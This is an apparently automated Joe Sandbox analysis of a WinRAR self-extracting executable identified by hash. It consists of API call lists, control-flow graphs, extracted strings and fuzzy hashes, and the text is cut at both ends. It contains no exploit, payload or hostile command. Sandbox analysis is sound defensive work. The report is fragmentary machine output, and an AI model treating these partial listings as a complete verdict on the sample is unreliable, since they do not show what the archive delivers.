                                                                                          • GetLocalTime.KERNEL32(?), ref: 003DC228
                                                                                          • _swprintf.LIBCMT ref: 003DC267
                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 003DC279
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 003DC27C
                                                                                          • LoadIconW.USER32(00000000,00000064), ref: 003DC293
                                                                                          • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00019B4F,00000000), ref: 003DC2E4
                                                                                          • Sleep.KERNEL32(?), ref: 003DC312
                                                                                          • DeleteObject.GDI32 ref: 003DC351
                                                                                          • DeleteObject.GDI32(?), ref: 003DC35D
                                                                                            • Part of subcall function 003DA8D4: CharUpperW.USER32(?,?,?,?,00001000), ref: 003DA92C
                                                                                            • Part of subcall function 003DA8D4: CharUpperW.USER32(?,?,?,?,?,00001000), ref: 003DA953
                                                                                          • CloseHandle.KERNEL32 ref: 003DC39C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentFileHandleVariable$Module$AddressCharCloseDeleteObjectProcUpperView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                          • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$*a@$*xA$C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                          • API String ID: 985665271-3120864760
                                                                                          • Opcode ID: f7f2d64844a0bc3b9ffc7a271c57255ef1221706fa7223b0aba975a2423fb624
                                                                                          • Instruction ID: b85394f3aa85b04acc935d081ab0ccdcf0343cc18a7c7112d0b73436ab04d431
                                                                                          • Opcode Fuzzy Hash: f7f2d64844a0bc3b9ffc7a271c57255ef1221706fa7223b0aba975a2423fb624
                                                                                          • Instruction Fuzzy Hash: DE61E776914305AED313AB65FD49F7B3BACAB48700F04442BF941AB3A2DBB88D44C765

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 598 3d8bd0-3d8beb FindResourceW 599 3d8cc6-3d8cc8 598->599 600 3d8bf1-3d8c03 SizeofResource 598->600 601 3d8c05-3d8c14 LoadResource 600->601 602 3d8c23-3d8c25 600->602 601->602 604 3d8c16-3d8c21 LockResource 601->604 603 3d8cc5 602->603 603->599 604->602 605 3d8c2a-3d8c3f GlobalAlloc 604->605 606 3d8cbf-3d8cc4 605->606 607 3d8c41-3d8c4a GlobalLock 605->607 606->603 608 3d8c4c-3d8c6a call 3de000 CreateStreamOnHGlobal 607->608 609 3d8cb8-3d8cb9 GlobalFree 607->609 612 3d8c6c-3d8c84 call 3d8b65 608->612 613 3d8cb1-3d8cb2 GlobalUnlock 608->613 609->606 612->613 617 3d8c86-3d8c8e 612->617 613->609 618 3d8ca9-3d8cad 617->618 619 3d8c90-3d8ca4 GdipCreateHBITMAPFromBitmap 617->619 618->613 619->618 620 3d8ca6 619->620 620->618
                                                                                          APIs
                                                                                          • FindResourceW.KERNELBASE(00000066,PNG,?,?,003D9AC8,00000066), ref: 003D8BE1
                                                                                          • SizeofResource.KERNEL32(00000000,75FD5780,?,?,003D9AC8,00000066), ref: 003D8BF9
                                                                                          • LoadResource.KERNEL32(00000000,?,?,003D9AC8,00000066), ref: 003D8C0C
                                                                                          • LockResource.KERNEL32(00000000,?,?,003D9AC8,00000066), ref: 003D8C17
                                                                                          • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,003D9AC8,00000066), ref: 003D8C35
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 003D8C42
                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 003D8C62
                                                                                          • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 003D8C9D
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 003D8CB2
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 003D8CB9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                                                                          • String ID: PNG
                                                                                          • API String ID: 3656887471-364855578
                                                                                          • Opcode ID: 1cef85c394a86f0afccef3f68e4c95709a5873233d93328e95f9a065b09e77d4
                                                                                          • Instruction ID: a4e677f732a5462d8620acf18a8eb17752f674577dfdcaf9b67d82c9d903822b
                                                                                          • Opcode Fuzzy Hash: 1cef85c394a86f0afccef3f68e4c95709a5873233d93328e95f9a065b09e77d4
                                                                                          • Instruction Fuzzy Hash: F3214F76512606AFC7239F25ED49A7BBBACEF45791B01052AF84587361DB21EC00CAA1

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 869 3ca273-3ca299 call 3dcec0 872 3ca30d-3ca316 FindNextFileW 869->872 873 3ca29b-3ca2ae FindFirstFileW 869->873 874 3ca32c-3ca32e 872->874 875 3ca318-3ca326 GetLastError 872->875 876 3ca334-3ca3dd call 3cf10e call 3cb902 call 3d01c1 * 3 873->876 877 3ca2b4-3ca2cf call 3cb275 873->877 874->876 878 3ca3e2-3ca3f5 874->878 875->874 876->878 884 3ca2e6-3ca2ef GetLastError 877->884 885 3ca2d1-3ca2e4 FindFirstFileW 877->885 887 3ca300 884->887 888 3ca2f1-3ca2f4 884->888 885->876 885->884 891 3ca302-3ca308 887->891 888->887 890 3ca2f6-3ca2f9 888->890 890->887 893 3ca2fb-3ca2fe 890->893 891->878 893->891
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,003CA16E,000000FF,?,?), ref: 003CA2A8
                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,003CA16E,000000FF,?,?), ref: 003CA2DE
                                                                                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,003CA16E,000000FF,?,?), ref: 003CA2E6
                                                                                          • FindNextFileW.KERNEL32(?,?,?,?,?,?,003CA16E,000000FF,?,?), ref: 003CA30E
                                                                                          • GetLastError.KERNEL32(?,?,?,?,003CA16E,000000FF,?,?), ref: 003CA31A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFind$ErrorFirstLast$Next
                                                                                          • String ID:
                                                                                          • API String ID: 869497890-0
                                                                                          • Opcode ID: a86c24ca906d383af477bd9ead58b9d28bf6ba9dc34ef8939a986dabafb41c4f
                                                                                          • Instruction ID: e9d1c0bb10d4f2c53117d376afb5e654e18c24f71d80172d902f3281a97a72dd
                                                                                          • Opcode Fuzzy Hash: a86c24ca906d383af477bd9ead58b9d28bf6ba9dc34ef8939a986dabafb41c4f
                                                                                          • Instruction Fuzzy Hash: 14418176608685AFC326DF68C881FDAF7E8BB49344F000A2EF5D9D3240D734AD548B92
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(?,?,003E4A30,?,003F7F68,0000000C,003E4B87,?,00000002,00000000), ref: 003E4A7B
                                                                                          • TerminateProcess.KERNEL32(00000000,?,003E4A30,?,003F7F68,0000000C,003E4B87,?,00000002,00000000), ref: 003E4A82
                                                                                          • ExitProcess.KERNEL32 ref: 003E4A94
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 1703294689-0
                                                                                          • Opcode ID: ee7026bc774944c3272c50f5fb9b8eb2c0ebc1125cdfde0095b70086ebb08054
                                                                                          • Instruction ID: 692fd229fadbb3ae7c9939e2032310cefe30c78b8c7c9191f1d535f0997ba6af
                                                                                          • Opcode Fuzzy Hash: ee7026bc774944c3272c50f5fb9b8eb2c0ebc1125cdfde0095b70086ebb08054
                                                                                          • Instruction Fuzzy Hash: D1E04631440198AFCF13AF29CD09A983B2DEB08351F010124F8099A172CF35DC82CB84
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 003C840E
                                                                                          • _memcmp.LIBVCRUNTIME ref: 003C8870
                                                                                            • Part of subcall function 003C80F8: CharUpperW.USER32(?,?,00000000,?,?,?,?,?,?,?,00000800,?,003C86E9,?,-00000930,?), ref: 003C81BB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: CharH_prologUpper_memcmp
                                                                                          • String ID:
                                                                                          • API String ID: 4047935103-0
                                                                                          • Opcode ID: 87d24a45af44b575fc1c151af02bb484f0c0cba0b8947159a47297823269d4f9
                                                                                          • Instruction ID: b406483f5c69cdadbe9bc24d1820e62e63c54aa6cb7c59d611eb2187658bdae3
                                                                                          • Opcode Fuzzy Hash: 87d24a45af44b575fc1c151af02bb484f0c0cba0b8947159a47297823269d4f9
                                                                                          • Instruction Fuzzy Hash: 4D72A171504185AEDF27DF648885FEABBA8AF05304F0941BEE949DF182DB319F89C760
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: 0ec07e458ed549b5ccd59e69f13597042c9cfcc40d7992caa6249df795247564
                                                                                          • Instruction ID: 4f0c340be90dd4230cf2b9b302c992a26139ab174e9383a10a1f2908966d6bd1
                                                                                          • Opcode Fuzzy Hash: 0ec07e458ed549b5ccd59e69f13597042c9cfcc40d7992caa6249df795247564
                                                                                          • Instruction Fuzzy Hash: 1BD136B2A047458FCB16CF28E884B5ABBE1BF94304F09056FE8449B742D734ED59CB96
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 003D9B54
                                                                                            • Part of subcall function 003C12E7: GetDlgItem.USER32(00000000,00003021), ref: 003C132B
                                                                                            • Part of subcall function 003C12E7: SetWindowTextW.USER32(00000000,003F02E4), ref: 003C1341
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prologItemTextWindow
                                                                                          • String ID: !@$"%s"%s$*A@$*a@$*xA$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                          • API String ID: 810644672-27168330
                                                                                          • Opcode ID: ca196f082a0651d654df4c5ff094a071dd924f24eaa3e1fd77cb28ed16fe1f4e
                                                                                          • Instruction ID: b9ebc245d33586d1c6eea117ca0c2dac8bfa6d5dc06218cf0e55d84ef3bd78e5
                                                                                          • Opcode Fuzzy Hash: ca196f082a0651d654df4c5ff094a071dd924f24eaa3e1fd77cb28ed16fe1f4e
                                                                                          • Instruction Fuzzy Hash: 404219B2940345BEEB239F60AE49FFA3B6DAB05700F01406BF645BA2D1C7B44D54CB66

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 257 3cf353-3cf375 call 3dcec0 GetModuleHandleW 260 3cf3c8-3cf62f 257->260 261 3cf377-3cf38e GetProcAddress 257->261 262 3cf6fd-3cf72e GetModuleFileNameW call 3cb88c call 3cf10e 260->262 263 3cf635-3cf640 call 3e462a 260->263 264 3cf3a0-3cf3aa GetProcAddress 261->264 265 3cf390-3cf39d 261->265 277 3cf730-3cf73a call 3ca8e0 262->277 263->262 272 3cf646-3cf673 GetModuleFileNameW CreateFileW 263->272 264->260 267 3cf3ac-3cf3c3 264->267 265->264 267->260 275 3cf675-3cf683 SetFilePointer 272->275 276 3cf6f1-3cf6f8 CloseHandle 272->276 275->276 278 3cf685-3cf6a2 ReadFile 275->278 276->262 283 3cf73c-3cf740 call 3cf309 277->283 284 3cf747 277->284 278->276 280 3cf6a4-3cf6c9 278->280 282 3cf6e6-3cf6ef call 3cef07 280->282 282->276 292 3cf6cb-3cf6e5 call 3cf309 282->292 289 3cf745 283->289 287 3cf749-3cf74b 284->287 290 3cf76d-3cf78f call 3cb902 GetFileAttributesW 287->290 291 3cf74d-3cf76b CompareStringW 287->291 289->287 294 3cf791-3cf795 290->294 300 3cf799 290->300 291->290 291->294 292->282 294->277 296 3cf797 294->296 299 3cf79d-3cf7a2 296->299 301 3cf7a4 299->301 302 3cf7d6-3cf7d8 299->302 300->299 303 3cf7a6-3cf7c8 call 3cb902 GetFileAttributesW 301->303 304 3cf7de-3cf7f5 call 3cb8d6 call 3ca8e0 302->304 305 3cf8e5-3cf8ef 302->305 310 3cf7ca-3cf7ce 303->310 311 3cf7d2 303->311 315 3cf85d-3cf890 call 3c3f5b AllocConsole 304->315 316 3cf7f7-3cf858 call 3cf309 * 2 call 3cd142 call 3c3f5b call 3cd142 call 3d8ccb 304->316 310->303 313 3cf7d0 310->313 311->302 313->302 321 3cf8dd-3cf8df ExitProcess 315->321 322 3cf892-3cf8d7 GetCurrentProcessId AttachConsole call 3e20b3 GetStdHandle WriteConsoleW Sleep FreeConsole 315->322 316->321 322->321
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32 ref: 003CF36B
                                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 003CF383
                                                                                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003CF3A6
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 003CF651
                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003CF669
                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 003CF67B
                                                                                          • ReadFile.KERNEL32(00000000,?,00007FFE,003F0858,00000000), ref: 003CF69A
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 003CF6F2
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 003CF708
                                                                                          • CompareStringW.KERNEL32(00000400,00001001,003F08A4,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 003CF762
                                                                                          • GetFileAttributesW.KERNELBASE(?,?,003F0870,00000800,?,00000000,?,00000800), ref: 003CF78B
                                                                                          • GetFileAttributesW.KERNEL32(?,?,0?,00000800), ref: 003CF7C4
                                                                                            • Part of subcall function 003CF309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003CF324
                                                                                            • Part of subcall function 003CF309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,003CDEC8,Crypt32.dll,?,003CDF4A,?,003CDF2E,?,?,?,?), ref: 003CF346
                                                                                          • _swprintf.LIBCMT ref: 003CF834
                                                                                          • _swprintf.LIBCMT ref: 003CF880
                                                                                            • Part of subcall function 003C3F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003C3F6E
                                                                                          • AllocConsole.KERNEL32 ref: 003CF888
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 003CF892
                                                                                          • AttachConsole.KERNEL32(00000000), ref: 003CF899
                                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 003CF8BF
                                                                                          • WriteConsoleW.KERNEL32(00000000), ref: 003CF8C6
                                                                                          • Sleep.KERNEL32(00002710), ref: 003CF8D1
                                                                                          • FreeConsole.KERNEL32 ref: 003CF8D7
                                                                                          • ExitProcess.KERNEL32 ref: 003CF8DF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                                                          • String ID: ?$$?$,?$0?$@?$D?$D?$DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$\?$\?$`?$dwmapi.dll$kernel32$t?$uxtheme.dll$x?$x?$?$?
                                                                                          • API String ID: 1201351596-901325715
                                                                                          • Opcode ID: 6b0ae6d2546e47c80a5e6aa8fcca98668f07f9cc0cbd769c87dfc222f8c2b011
                                                                                          • Instruction ID: 6a4fa94e7186281ade34ef34e0d581d73f7cdf0af9d6c548dcedd894a0139fb9
                                                                                          • Opcode Fuzzy Hash: 6b0ae6d2546e47c80a5e6aa8fcca98668f07f9cc0cbd769c87dfc222f8c2b011
                                                                                          • Instruction Fuzzy Hash: FFD163B50083899ED7279F68CC49FAFB7E8AF84344F50491DF288DA152DBB09908CB56

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 404 3daa45-3daa5d call 3dcdf0 call 3dcec0 409 3db645-3db652 404->409 410 3daa63-3daa8d call 3d96ec 404->410 410->409 413 3daa93-3daa98 410->413 414 3daa99-3daaa7 413->414 415 3daaa8-3daab8 call 3d93ba 414->415 418 3daaba 415->418 419 3daabc-3daad1 call 3d0b12 418->419 422 3daade-3daae1 419->422 423 3daad3-3daad7 419->423 424 3daae7 422->424 425 3db611-3db63c call 3d96ec 422->425 423->419 426 3daad9 423->426 427 3dacdd-3dacdf 424->427 428 3daaee-3daaf1 424->428 429 3dad7e-3dad80 424->429 430 3dad9b-3dad9d 424->430 425->414 441 3db642-3db644 425->441 426->425 427->425 435 3dace5-3dacf1 427->435 428->425 433 3daaf7-3dab64 call 3d8b8e call 3cb56e call 3ca11c call 3ca256 call 3c6fa3 call 3ca1a9 428->433 429->425 432 3dad86-3dad96 SetWindowTextW 429->432 430->425 434 3dada3-3dadaa 430->434 432->425 507 3dacc9-3dacd8 call 3ca132 433->507 508 3dab6a-3dab70 433->508 434->425 438 3dadb0-3dadc9 434->438 439 3dad05-3dad0a 435->439 440 3dacf3-3dad04 call 3e4654 435->440 443 3dadcb 438->443 444 3dadd1-3daddf call 3e20b3 438->444 446 3dad0c-3dad12 439->446 447 3dad14-3dad1f call 3d9844 439->447 440->439 441->409 443->444 444->425 461 3dade5-3dadee 444->461 451 3dad24-3dad26 446->451 447->451 456 3dad28-3dad2f call 3e20b3 451->456 457 3dad31-3dad51 call 3e20b3 call 3e20de 451->457 456->457 478 3dad6a-3dad6c 457->478 479 3dad53-3dad5a 457->479 465 3dae17-3dae1a 461->465 466 3dadf0-3dadf4 461->466 467 3daeff-3daf0d call 3cf10e 465->467 468 3dae20-3dae23 465->468 466->465 471 3dadf6-3dadfe 466->471 488 3daf0f-3daf23 call 3e031b 467->488 472 3dae25-3dae2a 468->472 473 3dae30-3dae4b 468->473 471->425 477 3dae04-3dae12 call 3cf10e 471->477 472->467 472->473 490 3dae4d-3dae87 473->490 491 3dae95-3dae9c 473->491 477->488 478->425 487 3dad72-3dad79 call 3e20ce 478->487 484 3dad5c-3dad5e 479->484 485 3dad61-3dad69 call 3e4654 479->485 484->485 485->478 487->425 502 3daf25-3daf29 488->502 503 3daf30-3daf83 call 3cf10e call 3d9592 GetDlgItem SetWindowTextW SendMessageW call 3e20e9 488->503 528 3dae89 490->528 529 3dae8b-3dae8d 490->529 497 3dae9e-3daeb6 call 3e20b3 491->497 498 3daeca-3daeed call 3e20b3 * 2 491->498 497->498 515 3daeb8-3daec5 call 3cf0e6 497->515 498->488 533 3daeef-3daefd call 3cf0e6 498->533 502->503 510 3daf2b-3daf2d 502->510 542 3daf88-3daf8c 503->542 507->425 509 3dab77-3dab8c SetFileAttributesW 508->509 516 3dac32-3dac3e GetFileAttributesW 509->516 517 3dab92-3dabc5 call 3cb100 call 3cadf5 call 3e20b3 509->517 510->503 515->498 525 3dacae-3dacc3 call 3ca1a9 516->525 526 3dac40-3dac4f DeleteFileW 516->526 551 3dabd8-3dabe6 call 3cb52e 517->551 552 3dabc7-3dabd6 call 3e20b3 517->552 525->507 540 3dab72 525->540 526->525 532 3dac51-3dac54 526->532 528->529 529->491 538 3dac58-3dac84 call 3c3f5b GetFileAttributesW 532->538 533->488 549 3dac56-3dac57 538->549 550 3dac86-3dac9c MoveFileW 538->550 540->509 542->425 546 3daf92-3dafa4 SendMessageW 542->546 546->425 549->538 550->525 553 3dac9e-3daca8 MoveFileExW 550->553 551->507 558 3dabec-3dac2b call 3e20b3 call 3ddea0 551->558 552->551 552->558 553->525 558->516
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 003DAA4A
                                                                                            • Part of subcall function 003D96EC: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 003D97B4
                                                                                          • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,003DA35D,?,00000000), ref: 003DAB7F
                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 003DAC39
                                                                                          • DeleteFileW.KERNEL32(?), ref: 003DAC47
                                                                                          • SetWindowTextW.USER32(?,?), ref: 003DAD90
                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 003DAF1A
                                                                                          • GetDlgItem.USER32(?,00000066), ref: 003DAF55
